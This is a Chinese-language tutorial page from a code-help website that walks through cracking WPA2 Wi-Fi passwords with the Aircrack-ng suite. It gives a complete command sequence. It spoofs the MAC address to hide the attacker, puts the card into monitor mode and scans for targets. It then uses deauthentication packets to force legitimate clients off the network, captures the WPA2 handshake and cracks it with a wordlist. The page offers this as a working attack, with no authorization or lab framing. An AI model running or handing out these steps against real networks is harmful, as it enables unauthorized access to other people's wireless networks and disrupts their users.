当前位置: 代码迷 >> 综合 >> Aircrack-ng
  详细解决方案

Aircrack-ng

热度:58   发布时间:2024-02-01 15:20:38.0

Aircrack-ng

Aircrack-ng是一个包含了多款工具的套装,我们需要使用里面的:

  • airmon-ng
  • airodump-ng
  • aireplay-ng
  • aircrack-ng

准备

sudo ifconfig
sudo ifconfig wlan0 down
sudo macchanger --mac 00:11:22:33:44:55 wlan0 //隐藏MAC
sudo ifconfig wlan0 up
sudo airmon-ng check kill //结束系统系统中可能的干扰进程
sudo airmon-ng start wlan0 //开启网卡的监听模式。并记住监听模式的名字
sudo ifconfig wlan0mon down
sudo iwconfig wlan0mon mode monitor
sudo ifconfig wlan0mon up

探测

sudo airodump-ng wlan0mon//开始监听
//ESSID:wifi的名字,BSSID:MAC,CH:工作频道

抓包

sudo airodump-ng --ivs –w 文件名 -c 监听频道 --bssid 目标MAC  wlan0mon
sudo aireplay-ng -0 1 –a FC:D7:33:3F:BC:F8 -c 08:ED:B9:89:FB:B1 wlan0mon
//为了获得破解所需的WPA2握手验证的整个完整数据包,我们将会发送一种称之为“Deauth”的数据包来将已经连接至无线路由器的合法无线客户端强制断开,此时,客户端就会自动重新连接无线路由器,我们也就有机会捕获到包含WPA2握手验证的完整数据包了。

攻击
打开另一个shell
sudo aireplay-ng -0 攻击次数(0~10) –a 路由器的MAC(BSSID) -c 客户端MAC(STATION) wlan0mon
WPA handshake,如果没有,就再攻击一次

破解

sudo aircrack-ng -w 字典.txt 文件名-xx.ivs

结束

sudo ifconfig wlan0 down
sudo ifconfig wlan0 up
systemctl start NetworkManager
  相关解决方案

代码迷 - 您身边的软件异常,代码异常,编程异常助手(发现,解决,分享)
Copyright © 2009-2013 DAIMAMI.COM. All rights reserved.